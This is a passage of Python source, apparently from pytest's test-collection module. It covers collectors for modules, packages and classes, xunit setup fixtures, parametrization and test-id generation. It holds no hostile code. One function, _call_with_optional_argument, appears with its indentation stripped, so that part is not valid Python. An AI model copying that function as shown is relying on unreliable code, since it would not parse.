        compat_co_firstlineno = getattr(obj, "compat_co_firstlineno", None)
        if isinstance(compat_co_firstlineno, int):
            # nose compatibility
            fspath = sys.modules[obj.__module__].__file__
            if fspath.endswith(".pyc"):
                fspath = fspath[:-1]
            lineno = compat_co_firstlineno
        else:
            fspath, lineno = getfslineno(obj)
        modpath = self.getmodpath()
        assert isinstance(lineno, int)
        return fspath, lineno, modpath
class PyCollector(PyobjMixin, nodes.Collector):
    """Base collector for Python objects.

    Provides the name filters (``python_functions`` / ``python_classes`` ini
    options plus nose's ``__test__`` marker) and a generic ``collect()`` that
    walks the object's namespace and asks the ``pytest_pycollect_makeitem``
    hook to build child nodes.
    """

    def funcnamefilter(self, name):
        # Does `name` look like a test function per the ini configuration?
        return self._matches_prefix_or_glob_option("python_functions", name)

    def isnosetest(self, obj):
        """ Look for the __test__ attribute, which is applied by the
        @nose.tools.istest decorator
        """
        # We explicitly check for "is True" here to not mistakenly treat
        # classes with a custom __getattr__ returning something truthy (like a
        # function) as test classes.
        return safe_getattr(obj, "__test__", False) is True

    def classnamefilter(self, name):
        # Does `name` look like a test class per the ini configuration?
        return self._matches_prefix_or_glob_option("python_classes", name)

    def istestfunction(self, obj, name):
        """Return True if attribute ``name`` holding ``obj`` should be
        collected as a test function: name matches (or nose marked it),
        it is callable, and it is not itself a fixture."""
        if self.funcnamefilter(name) or self.isnosetest(obj):
            if isinstance(obj, staticmethod):
                # static methods need to be unwrapped
                obj = safe_getattr(obj, "__func__", False)
            return (
                safe_getattr(obj, "__call__", False)
                and fixtures.getfixturemarker(obj) is None
            )
        else:
            return False

    def istestclass(self, obj, name):
        # Collected when the name matches the ini patterns or nose marked it.
        return self.classnamefilter(name) or self.isnosetest(obj)

    def _matches_prefix_or_glob_option(self, option_name, name):
        """
        checks if the given name matches the prefix or glob-pattern defined
        in ini configuration.
        """
        for option in self.config.getini(option_name):
            if name.startswith(option):
                return True
            # check that name looks like a glob-string before calling fnmatch
            # because this is called for every name in each collected module,
            # and fnmatch is somewhat expensive to call
            elif ("*" in option or "?" in option or "[" in option) and fnmatch.fnmatch(
                name, option
            ):
                return True
        return False

    def collect(self):
        """Collect children by scanning ``self.obj``'s namespace (its own
        ``__dict__`` first, then each base class), sorted by source order."""
        if not getattr(self.obj, "__test__", True):
            # honor an explicit ``__test__ = False`` opt-out
            return []

        # NB. we avoid random getattrs and peek in the __dict__ instead
        # (XXX originally introduced from a PyPy need, still true?)
        dicts = [getattr(self.obj, "__dict__", {})]
        for basecls in inspect.getmro(self.obj.__class__):
            dicts.append(basecls.__dict__)
        seen = {}
        values = []
        for dic in dicts:
            for name, obj in list(dic.items()):
                if name in seen:
                    # the first (most derived) definition wins
                    continue
                seen[name] = True
                res = self._makeitem(name, obj)
                if res is None:
                    continue
                if not isinstance(res, list):
                    res = [res]
                values.extend(res)
        # sort by (file, line) so output order matches source order
        values.sort(key=lambda item: item.reportinfo()[:2])
        return values

    def _makeitem(self, name, obj):
        """Delegate node creation to the ``pytest_pycollect_makeitem`` hook."""
        # assert self.ihook.fspath == self.fspath, self
        return self.ihook.pytest_pycollect_makeitem(collector=self, name=name, obj=obj)

    def _genfunctions(self, name, funcobj):
        """Yield one ``Function`` node per call spec produced by
        parametrization, or a single node when not parametrized."""
        module = self.getparent(Module).obj
        clscol = self.getparent(Class)
        cls = clscol and clscol.obj or None
        fm = self.session._fixturemanager

        definition = FunctionDefinition(name=name, parent=self, callobj=funcobj)
        fixtureinfo = fm.getfixtureinfo(definition, funcobj, cls)

        metafunc = Metafunc(
            definition, fixtureinfo, self.config, cls=cls, module=module
        )
        # collect pytest_generate_tests implementations from the module and
        # (when present) the class, in addition to regular plugin hooks
        methods = []
        if hasattr(module, "pytest_generate_tests"):
            methods.append(module.pytest_generate_tests)
        if hasattr(cls, "pytest_generate_tests"):
            methods.append(cls().pytest_generate_tests)

        self.ihook.pytest_generate_tests.call_extra(methods, dict(metafunc=metafunc))

        if not metafunc._calls:
            yield Function(name, parent=self, fixtureinfo=fixtureinfo)
        else:
            # add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
            fixtures.add_funcarg_pseudo_fixture_def(self, metafunc, fm)

            # add_funcarg_pseudo_fixture_def may have shadowed some fixtures
            # with direct parametrization, so make sure we update what the
            # function really needs.
            fixtureinfo.prune_dependency_tree()

            for callspec in metafunc._calls:
                subname = "{}[{}]".format(name, callspec.id)
                yield Function(
                    name=subname,
                    parent=self,
                    callspec=callspec,
                    callobj=funcobj,
                    fixtureinfo=fixtureinfo,
                    keywords={callspec.id: True},
                    originalname=name,
                )
class Module(nodes.File, PyCollector):
    """ Collector for test classes and functions. """

    def _getobj(self):
        # the "python object" backing this node is the imported module itself
        return self._importtestmodule()

    def collect(self):
        # inject xunit-style setup/teardown fixtures before delegating to the
        # generic namespace-scanning collection
        self._inject_setup_module_fixture()
        self._inject_setup_function_fixture()
        self.session._fixturemanager.parsefactories(self)
        return super().collect()

    def _inject_setup_module_fixture(self):
        """Injects a hidden autouse, module scoped fixture into the collected module object
        that invokes setUpModule/tearDownModule if either or both are available.

        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_module = _get_first_non_fixture_func(
            self.obj, ("setUpModule", "setup_module")
        )
        teardown_module = _get_first_non_fixture_func(
            self.obj, ("tearDownModule", "teardown_module")
        )

        if setup_module is None and teardown_module is None:
            return

        @fixtures.fixture(autouse=True, scope="module")
        def xunit_setup_module_fixture(request):
            if setup_module is not None:
                _call_with_optional_argument(setup_module, request.module)
            yield
            if teardown_module is not None:
                _call_with_optional_argument(teardown_module, request.module)

        self.obj.__pytest_setup_module = xunit_setup_module_fixture

    def _inject_setup_function_fixture(self):
        """Injects a hidden autouse, function scoped fixture into the collected module object
        that invokes setup_function/teardown_function if either or both are available.

        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_function = _get_first_non_fixture_func(self.obj, ("setup_function",))
        teardown_function = _get_first_non_fixture_func(
            self.obj, ("teardown_function",)
        )
        if setup_function is None and teardown_function is None:
            return

        @fixtures.fixture(autouse=True, scope="function")
        def xunit_setup_function_fixture(request):
            if request.instance is not None:
                # in this case we are bound to an instance, so we need to let
                # setup_method handle this
                yield
                return
            if setup_function is not None:
                _call_with_optional_argument(setup_function, request.function)
            yield
            if teardown_function is not None:
                _call_with_optional_argument(teardown_function, request.function)

        self.obj.__pytest_setup_function = xunit_setup_function_fixture

    def _importtestmodule(self):
        """Import the test module, translating the various ways an import can
        fail into ``CollectError`` with a user-friendly message."""
        # we assume we are only called once per module
        importmode = self.config.getoption("--import-mode")
        try:
            mod = self.fspath.pyimport(ensuresyspath=importmode)
        except SyntaxError:
            raise self.CollectError(
                _pytest._code.ExceptionInfo.from_current().getrepr(style="short")
            )
        except self.fspath.ImportMismatchError:
            e = sys.exc_info()[1]
            raise self.CollectError(
                "import file mismatch:\n"
                "imported module %r has this __file__ attribute:\n"
                " %s\n"
                "which is not the same as the test file we want to collect:\n"
                " %s\n"
                "HINT: remove __pycache__ / .pyc files and/or use a "
                "unique basename for your test file modules" % e.args
            )
        except ImportError:
            from _pytest._code.code import ExceptionInfo

            exc_info = ExceptionInfo.from_current()
            if self.config.getoption("verbose") < 2:
                # hide pytest-internal frames unless the user asked for detail
                exc_info.traceback = exc_info.traceback.filter(filter_traceback)
            exc_repr = (
                exc_info.getrepr(style="short")
                if exc_info.traceback
                else exc_info.exconly()
            )
            formatted_tb = str(exc_repr)
            raise self.CollectError(
                "ImportError while importing test module '{fspath}'.\n"
                "Hint: make sure your test modules/packages have valid Python names.\n"
                "Traceback:\n"
                "{traceback}".format(fspath=self.fspath, traceback=formatted_tb)
            )
        except _pytest.runner.Skipped as e:
            # module-level pytest.skip() is only allowed when explicitly
            # requested via allow_module_level=True
            if e.allow_module_level:
                raise
            raise self.CollectError(
                "Using pytest.skip outside of a test is not allowed. "
                "To decorate a test function, use the @pytest.mark.skip "
                "or @pytest.mark.skipif decorators instead, and to skip a "
                "module use `pytestmark = pytest.mark.{skip,skipif}."
            )
        self.config.pluginmanager.consider_module(mod)
        return mod
class Package(Module):
    """Collector for a Python package directory (a dir with ``__init__.py``)."""

    def __init__(self, fspath, parent=None, config=None, session=None, nodeid=None):
        session = parent.session
        # deliberately bypass Module/File __init__ and initialize as a plain
        # filesystem collector rooted at the package's __init__.py
        nodes.FSCollector.__init__(
            self, fspath, parent=parent, config=config, session=session, nodeid=nodeid
        )
        self.name = fspath.dirname
        self.trace = session.trace
        self._norecursepatterns = session._norecursepatterns
        self.fspath = fspath

    def setup(self):
        # not using fixtures to call setup_module here because autouse fixtures
        # from packages are not called automatically (#4085)
        setup_module = _get_first_non_fixture_func(
            self.obj, ("setUpModule", "setup_module")
        )
        if setup_module is not None:
            _call_with_optional_argument(setup_module, self.obj)

        teardown_module = _get_first_non_fixture_func(
            self.obj, ("tearDownModule", "teardown_module")
        )
        if teardown_module is not None:
            func = partial(_call_with_optional_argument, teardown_module, self.obj)
            self.addfinalizer(func)

    def _recurse(self, dirpath):
        """Return True when collection should descend into ``dirpath``."""
        if dirpath.basename == "__pycache__":
            return False
        ihook = self.gethookproxy(dirpath.dirpath())
        if ihook.pytest_ignore_collect(path=dirpath, config=self.config):
            return
        for pat in self._norecursepatterns:
            if dirpath.check(fnmatch=pat):
                return False
        ihook = self.gethookproxy(dirpath)
        ihook.pytest_collect_directory(path=dirpath, parent=self)
        return True

    def gethookproxy(self, fspath):
        # check if we have the common case of running
        # hooks with all conftest.py files active
        pm = self.config.pluginmanager
        my_conftestmodules = pm._getconftestmodules(fspath)
        remove_mods = pm._conftest_plugins.difference(my_conftestmodules)
        if remove_mods:
            # one or more conftests are not in use at this fspath
            proxy = FSHookProxy(fspath, pm, remove_mods)
        else:
            # all plugins are active for this fspath
            proxy = self.config.hook
        return proxy

    def _collectfile(self, path, handle_dupes=True):
        """Collect a single file, honoring ignore hooks and (optionally)
        duplicate-path bookkeeping; returns a possibly-empty node sequence."""
        assert (
            path.isfile()
        ), "{!r} is not a file (isdir={!r}, exists={!r}, islink={!r})".format(
            path, path.isdir(), path.exists(), path.islink()
        )
        ihook = self.gethookproxy(path)
        if not self.isinitpath(path):
            if ihook.pytest_ignore_collect(path=path, config=self.config):
                return ()

        if handle_dupes:
            keepduplicates = self.config.getoption("keepduplicates")
            if not keepduplicates:
                duplicate_paths = self.config.pluginmanager._duplicatepaths
                if path in duplicate_paths:
                    return ()
                else:
                    duplicate_paths.add(path)

        if self.fspath == path:  # __init__.py
            return [self]

        return ihook.pytest_collect_file(path=path, parent=self)

    def isinitpath(self, path):
        # was this path given on the command line / as an initial argument?
        return path in self.session._initialpaths

    def collect(self):
        """Yield the package's own ``__init__.py`` module plus everything
        found while recursively visiting the package directory."""
        this_path = self.fspath.dirpath()
        init_module = this_path.join("__init__.py")
        if init_module.check(file=1) and path_matches_patterns(
            init_module, self.config.getini("python_files")
        ):
            yield Module(init_module, self)
        pkg_prefixes = set()
        for path in this_path.visit(rec=self._recurse, bf=True, sort=True):
            # We will visit our own __init__.py file, in which case we skip it.
            is_file = path.isfile()
            if is_file:
                if path.basename == "__init__.py" and path.dirpath() == this_path:
                    continue

            parts_ = parts(path.strpath)
            if any(
                pkg_prefix in parts_ and pkg_prefix.join("__init__.py") != path
                for pkg_prefix in pkg_prefixes
            ):
                # path lives under an already-seen sub-package; that
                # sub-package's own collect() will pick it up
                continue

            if is_file:
                yield from self._collectfile(path)
            elif not path.isdir():
                # Broken symlink or invalid/missing file.
                continue
            elif path.join("__init__.py").check(file=1):
                pkg_prefixes.add(path)
def _call_with_optional_argument(func, arg):
"""Call the given function with the given argument if func accepts one argument, otherwise
calls func without arguments"""
arg_count = func.__code__.co_argcount
if inspect.ismethod(func):
arg_count -= 1
if arg_count:
func(arg)
else:
func()
def _get_first_non_fixture_func(obj, names):
    """Return the attribute from the given object to be used as a setup/teardown
    xunit-style function, but only if not marked as a fixture to
    avoid calling it twice.
    """
    for candidate in names:
        func = getattr(obj, candidate, None)
        if func is None:
            continue
        if fixtures.getfixturemarker(func) is None:
            return func
class Class(PyCollector):
    """ Collector for test methods. """

    def collect(self):
        """Return an ``Instance`` child, or nothing when the class opts out
        (``__test__ = False``) or cannot be instantiated safely."""
        if not safe_getattr(self.obj, "__test__", True):
            return []
        if hasinit(self.obj):
            # a custom __init__ means we cannot safely instantiate the class
            self.warn(
                PytestCollectionWarning(
                    "cannot collect test class %r because it has a "
                    "__init__ constructor (from: %s)"
                    % (self.obj.__name__, self.parent.nodeid)
                )
            )
            return []
        elif hasnew(self.obj):
            # same reasoning for a custom __new__
            self.warn(
                PytestCollectionWarning(
                    "cannot collect test class %r because it has a "
                    "__new__ constructor (from: %s)"
                    % (self.obj.__name__, self.parent.nodeid)
                )
            )
            return []

        self._inject_setup_class_fixture()
        self._inject_setup_method_fixture()

        return [Instance(name="()", parent=self)]

    def _inject_setup_class_fixture(self):
        """Injects a hidden autouse, class scoped fixture into the collected class object
        that invokes setup_class/teardown_class if either or both are available.

        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_class = _get_first_non_fixture_func(self.obj, ("setup_class",))
        teardown_class = getattr(self.obj, "teardown_class", None)
        if setup_class is None and teardown_class is None:
            return

        @fixtures.fixture(autouse=True, scope="class")
        def xunit_setup_class_fixture(cls):
            if setup_class is not None:
                func = getimfunc(setup_class)
                _call_with_optional_argument(func, self.obj)
            yield
            if teardown_class is not None:
                func = getimfunc(teardown_class)
                _call_with_optional_argument(func, self.obj)

        self.obj.__pytest_setup_class = xunit_setup_class_fixture

    def _inject_setup_method_fixture(self):
        """Injects a hidden autouse, function scoped fixture into the collected class object
        that invokes setup_method/teardown_method if either or both are available.

        Using a fixture to invoke this methods ensures we play nicely and unsurprisingly with
        other fixtures (#517).
        """
        setup_method = _get_first_non_fixture_func(self.obj, ("setup_method",))
        teardown_method = getattr(self.obj, "teardown_method", None)
        if setup_method is None and teardown_method is None:
            return

        @fixtures.fixture(autouse=True, scope="function")
        def xunit_setup_method_fixture(self, request):
            method = request.function
            if setup_method is not None:
                func = getattr(self, "setup_method")
                _call_with_optional_argument(func, method)
            yield
            if teardown_method is not None:
                func = getattr(self, "teardown_method")
                _call_with_optional_argument(func, method)

        self.obj.__pytest_setup_method = xunit_setup_method_fixture
class Instance(PyCollector):
    """Collector wrapping one instance of a collected test class."""

    # hack, destroy later: instances share the object with their parents in a
    # way that duplicates markers instances if not taken out; can be removed
    # at node structure reorganization time
    _ALLOW_MARKERS = False

    def _getobj(self):
        # instantiate the class collected by our parent node
        return self.parent.obj()

    def collect(self):
        # register fixtures defined on the instance before collecting members
        fm = self.session._fixturemanager
        fm.parsefactories(self)
        return super().collect()

    def newinstance(self):
        # replace the cached object with a freshly created instance
        self.obj = self._getobj()
        return self.obj
class FunctionMixin(PyobjMixin):
    """ mixin for the code common to Function and Generator.
    """

    def setup(self):
        """ perform setup for this test function. """
        if isinstance(self.parent, Instance):
            # every test method runs against a fresh class instance
            self.parent.newinstance()
            self.obj = self._getobj()

    def _prunetraceback(self, excinfo):
        """Trim ``excinfo``'s traceback to the frames useful for reporting
        this test's failure (unless --full-trace is given)."""
        if hasattr(self, "_obj") and not self.config.getoption("fulltrace", False):
            code = _pytest._code.Code(get_real_func(self.obj))
            path, firstlineno = code.path, code.firstlineno
            traceback = excinfo.traceback
            # progressively weaker cuts: exact function, then file, then a
            # generic pytest-internals filter; fall back to the full traceback
            ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
            if ntraceback == traceback:
                ntraceback = ntraceback.cut(path=path)
                if ntraceback == traceback:
                    ntraceback = ntraceback.filter(filter_traceback)
                    if not ntraceback:
                        ntraceback = traceback

            excinfo.traceback = ntraceback.filter()
            # issue364: mark all but first and last frames to
            # only show a single-line message for each frame
            if self.config.getoption("tbstyle", "auto") == "auto":
                if len(excinfo.traceback) > 2:
                    for entry in excinfo.traceback[1:-1]:
                        entry.set_repr_style("short")

    def repr_failure(self, excinfo, outerr=None):
        """Return a failure representation honoring the configured tb style."""
        assert outerr is None, "XXX outerr usage is deprecated"
        style = self.config.getoption("tbstyle", "auto")
        if style == "auto":
            style = "long"
        return self._repr_failure_py(excinfo, style=style)
def hasinit(obj):
    """Return True if *obj* defines its own ``__init__`` — i.e. one that is
    not inherited directly from ``object``."""
    init = getattr(obj, "__init__", None)
    if init:
        return init != object.__init__
    # Fix: the original fell through and implicitly returned None; return an
    # explicit, consistent boolean instead (callers rely only on truthiness,
    # so this is backward compatible).
    return False
def hasnew(obj):
    """Return True if *obj* defines its own ``__new__`` — i.e. one that is
    not inherited directly from ``object``."""
    new = getattr(obj, "__new__", None)
    if new:
        return new != object.__new__
    # Fix: the original fell through and implicitly returned None; return an
    # explicit, consistent boolean instead (callers rely only on truthiness,
    # so this is backward compatible).
    return False
class CallSpec2:
    """One concrete parametrized invocation of a test function: its argument
    values, id parts, marks, parameter indices and scoping information."""

    def __init__(self, metafunc):
        self.metafunc = metafunc
        self.funcargs = {}
        self._idlist = []
        self.params = {}
        self._globalid = NOTSET
        self._globalparam = NOTSET
        # used for sorting parametrized resources
        self._arg2scopenum = {}
        self.marks = []
        self.indices = {}

    def copy(self):
        """Return an independent clone of this call spec."""
        clone = CallSpec2(self.metafunc)
        clone.funcargs.update(self.funcargs)
        clone.params.update(self.params)
        clone.marks.extend(self.marks)
        clone.indices.update(self.indices)
        clone._arg2scopenum.update(self._arg2scopenum)
        clone._idlist = list(self._idlist)
        clone._globalid = self._globalid
        clone._globalparam = self._globalparam
        return clone

    def _checkargnotcontained(self, arg):
        # an argname may only be parametrized once per spec
        if arg in self.params or arg in self.funcargs:
            raise ValueError("duplicate {!r}".format(arg))

    def getparam(self, name):
        """Return the parameter value for ``name``, falling back to the
        global parameter; raise ``ValueError`` when neither exists."""
        try:
            return self.params[name]
        except KeyError:
            if self._globalparam is NOTSET:
                raise ValueError(name)
            return self._globalparam

    @property
    def id(self):
        # join the non-empty id parts into the familiar "a-b-c" test id
        return "-".join(str(part) for part in self._idlist if part)

    def setmulti2(self, valtypes, argnames, valset, id, marks, scopenum, param_index):
        """Record one parameter set: store each value as either a fixture
        param or a funcarg, plus its index, scope, id part and marks."""
        for arg, val in zip(argnames, valset):
            self._checkargnotcontained(arg)
            # valtypes maps argname -> "params" or "funcargs"
            getattr(self, valtypes[arg])[arg] = val
            self.indices[arg] = param_index
            self._arg2scopenum[arg] = scopenum
        self._idlist.append(id)
        self.marks.extend(normalize_mark_list(marks))
class Metafunc:
    """
    Metafunc objects are passed to the :func:`pytest_generate_tests <_pytest.hookspec.pytest_generate_tests>` hook.
    They help to inspect a test function and to generate tests according to
    test configuration or values specified in the class or module where a
    test function is defined.
    """

    def __init__(self, definition, fixtureinfo, config, cls=None, module=None):
        assert (
            isinstance(definition, FunctionDefinition)
            or type(definition).__name__ == "DefinitionMock"
        )
        self.definition = definition

        #: access to the :class:`_pytest.config.Config` object for the test session
        self.config = config

        #: the module object where the test function is defined in.
        self.module = module

        #: underlying python test function
        self.function = definition.obj

        #: set of fixture names required by the test function
        self.fixturenames = fixtureinfo.names_closure

        #: class object where the test function is defined in or ``None``.
        self.cls = cls

        # accumulated CallSpec2 objects, one per parametrized invocation
        self._calls = []
        self._ids = set()
        self._arg2fixturedefs = fixtureinfo.name2fixturedefs

    @property
    def funcargnames(self):
        """ alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
        warnings.warn(FUNCARGNAMES, stacklevel=2)
        return self.fixturenames

    def parametrize(self, argnames, argvalues, indirect=False, ids=None, scope=None):
        """ Add new invocations to the underlying test function using the list
        of argvalues for the given argnames.  Parametrization is performed
        during the collection phase.  If you need to setup expensive resources
        see about setting indirect to do it rather at test setup time.

        :arg argnames: a comma-separated string denoting one or more argument
                       names, or a list/tuple of argument strings.

        :arg argvalues: The list of argvalues determines how often a
            test is invoked with different argument values. If only one
            argname was specified argvalues is a list of values.  If N
            argnames were specified, argvalues must be a list of N-tuples,
            where each tuple-element specifies a value for its respective
            argname.

        :arg indirect: The list of argnames or boolean. A list of arguments'
            names (subset of argnames). If True the list contains all names from
            the argnames. Each argvalue corresponding to an argname in this list will
            be passed as request.param to its respective argname fixture
            function so that it can perform more expensive setups during the
            setup phase of a test rather than at collection time.

        :arg ids: list of string ids, or a callable.
            If strings, each is corresponding to the argvalues so that they are
            part of the test id. If None is given as id of specific test, the
            automatically generated id for that argument will be used.
            If callable, it should take one argument (a single argvalue) and return
            a string or return None. If None, the automatically generated id for that
            argument will be used.
            If no ids are provided they will be generated automatically from
            the argvalues.

        :arg scope: if specified it denotes the scope of the parameters.
            The scope is used for grouping tests by parameter instances.
            It will also override any fixture-function defined scope, allowing
            to set a dynamic scope using test context or configuration.
        """
        from _pytest.fixtures import scope2index
        from _pytest.mark import ParameterSet

        # normalize argnames/argvalues into a list of names and ParameterSets
        argnames, parameters = ParameterSet._for_parametrize(
            argnames,
            argvalues,
            self.function,
            self.config,
            function_definition=self.definition,
        )
        del argvalues

        if "request" in argnames:
            fail(
                "'request' is a reserved name and cannot be used in @pytest.mark.parametrize",
                pytrace=False,
            )

        if scope is None:
            scope = _find_parametrized_scope(argnames, self._arg2fixturedefs, indirect)

        self._validate_if_using_arg_names(argnames, indirect)

        arg_values_types = self._resolve_arg_value_types(argnames, indirect)

        ids = self._resolve_arg_ids(argnames, ids, parameters, item=self.definition)

        scopenum = scope2index(
            scope, descr="parametrize() call in {}".format(self.function.__name__)
        )

        # create the new calls: if we are parametrize() multiple times (by applying the decorator
        # more than once) then we accumulate those calls generating the cartesian product
        # of all calls
        newcalls = []
        for callspec in self._calls or [CallSpec2(self)]:
            for param_index, (param_id, param_set) in enumerate(zip(ids, parameters)):
                newcallspec = callspec.copy()
                newcallspec.setmulti2(
                    arg_values_types,
                    argnames,
                    param_set.values,
                    param_id,
                    param_set.marks,
                    scopenum,
                    param_index,
                )
                newcalls.append(newcallspec)
        self._calls = newcalls

    def _resolve_arg_ids(self, argnames, ids, parameters, item):
        """Resolves the actual ids for the given argnames, based on the ``ids`` parameter given
        to ``parametrize``.

        :param List[str] argnames: list of argument names passed to ``parametrize()``.
        :param ids: the ids parameter of the parametrized call (see docs).
        :param List[ParameterSet] parameters: the list of parameter values, same size as ``argnames``.
        :param Item item: the item that generated this parametrized call.
        :rtype: List[str]
        :return: the list of ids for each argname given
        """
        from _pytest._io.saferepr import saferepr

        idfn = None
        if callable(ids):
            # a callable ``ids`` generates ids per-value instead of per-set
            idfn = ids
            ids = None
        if ids:
            func_name = self.function.__name__
            if len(ids) != len(parameters):
                msg = "In {}: {} parameter sets specified, with different number of ids: {}"
                fail(msg.format(func_name, len(parameters), len(ids)), pytrace=False)
            for id_value in ids:
                if id_value is not None and not isinstance(id_value, str):
                    msg = "In {}: ids must be list of strings, found: {} (type: {!r})"
                    fail(
                        msg.format(func_name, saferepr(id_value), type(id_value)),
                        pytrace=False,
                    )
        ids = idmaker(argnames, parameters, idfn, ids, self.config, item=item)
        return ids

    def _resolve_arg_value_types(self, argnames, indirect):
        """Resolves if each parametrized argument must be considered a parameter to a fixture or a "funcarg"
        to the function, based on the ``indirect`` parameter of the parametrized() call.

        :param List[str] argnames: list of argument names passed to ``parametrize()``.
        :param indirect: same ``indirect`` parameter of ``parametrize()``.
        :rtype: Dict[str, str]
            A dict mapping each arg name to either:
            * "params" if the argname should be the parameter of a fixture of the same name.
            * "funcargs" if the argname should be a parameter to the parametrized test function.
        """
        if isinstance(indirect, bool):
            # all-or-nothing: every argname gets the same treatment
            valtypes = dict.fromkeys(argnames, "params" if indirect else "funcargs")
        elif isinstance(indirect, Sequence):
            # start as funcargs, then flip the listed names to fixture params
            valtypes = dict.fromkeys(argnames, "funcargs")
            for arg in indirect:
                if arg not in argnames:
                    fail(
                        "In {}: indirect fixture '{}' doesn't exist".format(
                            self.function.__name__, arg
                        ),
                        pytrace=False,
                    )
                valtypes[arg] = "params"
        else:
            fail(
                "In {func}: expected Sequence or boolean for indirect, got {type}".format(
                    type=type(indirect).__name__, func=self.function.__name__
                ),
                pytrace=False,
            )
        return valtypes

    def _validate_if_using_arg_names(self, argnames, indirect):
        """
        Check if all argnames are being used, by default values, or directly/indirectly.

        :param List[str] argnames: list of argument names passed to ``parametrize()``.
        :param indirect: same ``indirect`` parameter of ``parametrize()``.
        :raise ValueError: if validation fails.
        """
        default_arg_names = set(get_default_arg_names(self.function))
        func_name = self.function.__name__
        for arg in argnames:
            if arg not in self.fixturenames:
                if arg in default_arg_names:
                    # parametrizing an argument that already has a default is
                    # almost certainly a mistake
                    fail(
                        "In {}: function already takes an argument '{}' with a default value".format(
                            func_name, arg
                        ),
                        pytrace=False,
                    )
                else:
                    if isinstance(indirect, (tuple, list)):
                        name = "fixture" if arg in indirect else "argument"
                    else:
                        name = "fixture" if indirect else "argument"
                    fail(
                        "In {}: function uses no {} '{}'".format(func_name, name, arg),
                        pytrace=False,
                    )
def _find_parametrized_scope(argnames, arg2fixturedefs, indirect):
    """Find the most appropriate scope for a parametrized call based on its arguments.

    When there's at least one direct argument, always use "function" scope.

    When a test function is parametrized and all its arguments are indirect
    (e.g. fixtures), return the narrowest scope among the fixtures used.

    Related to issue #1832, based on code posted by @Kingdread.
    """
    from _pytest.fixtures import scopes

    if isinstance(indirect, (list, tuple)):
        everything_indirect = len(indirect) == len(argnames)
    else:
        everything_indirect = bool(indirect)
    if everything_indirect:
        fixturedefs = arg2fixturedefs or {}
        used_scopes = [
            fixturedef[0].scope
            for name, fixturedef in fixturedefs.items()
            if name in argnames
        ]
        if used_scopes:
            # Takes the most narrow scope from used fixtures
            for candidate in reversed(scopes):
                if candidate in used_scopes:
                    return candidate

    return "function"
def _ascii_escaped_by_config(val, config):
    """Escape ``val`` via ``ascii_escaped`` unless the user opted out through
    the (deliberately discouraging) escaping ini option."""
    if config is None:
        escape = False
    else:
        escape = config.getini(
            "disable_test_id_escaping_and_forfeit_all_rights_to_community_support"
        )
    return val if escape else ascii_escaped(val)
def _idval(val, argname, idx, idfn, item, config):
    """Compute the id string for a single parametrized value, consulting the
    user ``idfn`` and the ``pytest_make_parametrize_id`` hook first."""
    if idfn:
        try:
            generated_id = idfn(val)
            if generated_id is not None:
                val = generated_id
        except Exception as e:
            # See issue https://github.com/pytest-dev/pytest/issues/2169
            msg = "{}: error raised while trying to determine id of parameter '{}' at position {}\n"
            raise ValueError(msg.format(item.nodeid, argname, idx)) from e
    elif config:
        hook_id = config.hook.pytest_make_parametrize_id(
            config=config, val=val, argname=argname
        )
        if hook_id:
            return hook_id

    if isinstance(val, STRING_TYPES):
        return _ascii_escaped_by_config(val, config)
    if val is None or isinstance(val, (float, int, bool)):
        return str(val)
    if isinstance(val, REGEX_TYPE):
        return ascii_escaped(val.pattern)
    if isinstance(val, enum.Enum):
        return str(val)
    if hasattr(val, "__name__") and isinstance(val.__name__, str):
        # name of a class, function, module, etc.
        return val.__name__
    # fall back to a positional id like "arg0"
    return str(argname) + str(idx)
def _idvalset(idx, parameterset, argnames, idfn, ids, item, config):
    """Compute the id for one parameter set, preferring an explicit
    ``pytest.param(id=...)``, then a user-supplied ids entry, then a
    generated per-value id."""
    if parameterset.id is not None:
        # explicit id given via pytest.param(..., id=...)
        return parameterset.id
    if ids is not None and idx < len(ids) and ids[idx] is not None:
        return _ascii_escaped_by_config(ids[idx], config)
    generated = [
        _idval(val, argname, idx, idfn, item=item, config=config)
        for val, argname in zip(parameterset.values, argnames)
    ]
    return "-".join(generated)
def idmaker(argnames, parametersets, idfn=None, ids=None, config=None, item=None):
    """Return one id string per parameter set, making duplicated ids unique
    by appending a per-id numeric suffix in order of appearance."""
    resolved = [
        _idvalset(index, parameterset, argnames, idfn, ids, config=config, item=item)
        for index, parameterset in enumerate(parametersets)
    ]
    if len(set(resolved)) != len(resolved):
        # The ids are not unique
        dupes = {testid for testid in resolved if resolved.count(testid) > 1}
        suffixes = Counter()
        for index, testid in enumerate(resolved):
            if testid in dupes:
                resolved[index] = testid + str(suffixes[testid])
                suffixes[testid] += 1
    return resolved
def show_fixtures_per_test(config):
    """Implement the ``--fixtures-per-test`` command line option."""
    from _pytest.main import wrap_session

    return wrap_session(config, _show_fixtures_per_test)
def _show_fixtures_per_test(config, session):
    """Collect the session and print, for each collected test item, the
    fixtures it uses (with locations and docstrings when verbose)."""
    import _pytest.config

    session.perform_collect()
    curdir = py.path.local()
    tw = _pytest.config.create_terminal_writer(config)
    verbose = config.getvalue("verbose")

    def get_best_relpath(func):
        # location of `func` relative to the invocation directory
        loc = getlocation(func, curdir)
        return curdir.bestrelpath(loc)

    def write_fixture(fixture_def):
        # print one fixture's name (plus location when verbose) and docstring
        argname = fixture_def.argname
        if verbose <= 0 and argname.startswith("_"):
            # private fixtures are only shown with -v
            return
        if verbose > 0:
            bestrel = get_best_relpath(fixture_def.func)
            funcargspec = "{} -- {}".format(argname, bestrel)
        else:
            funcargspec = argname
        tw.line(funcargspec, green=True)
        fixture_doc = fixture_def.func.__doc__
        if fixture_doc:
            write_docstring(tw, fixture_doc)
        else:
            tw.line(" no docstring available", red=True)

    def write_item(item):
        # print the fixtures used by a single test item
        try:
            info = item._fixtureinfo
        except AttributeError:
            # doctests items have no _fixtureinfo attribute
            return
        if not info.name2fixturedefs:
            # this test item does not use any fixtures
            return
        tw.line()
        tw.sep("-", "fixtures used by {}".format(item.name))
        tw.sep("-", "({})".format(get_best_relpath(item.function)))
        # dict key not used in loop but needed for sorting
        for _, fixturedefs in sorted(info.name2fixturedefs.items()):
            assert fixturedefs is not None
            if not fixturedefs:
                continue
            # last item is expected to be the one used by the test item
            write_fixture(fixturedefs[-1])

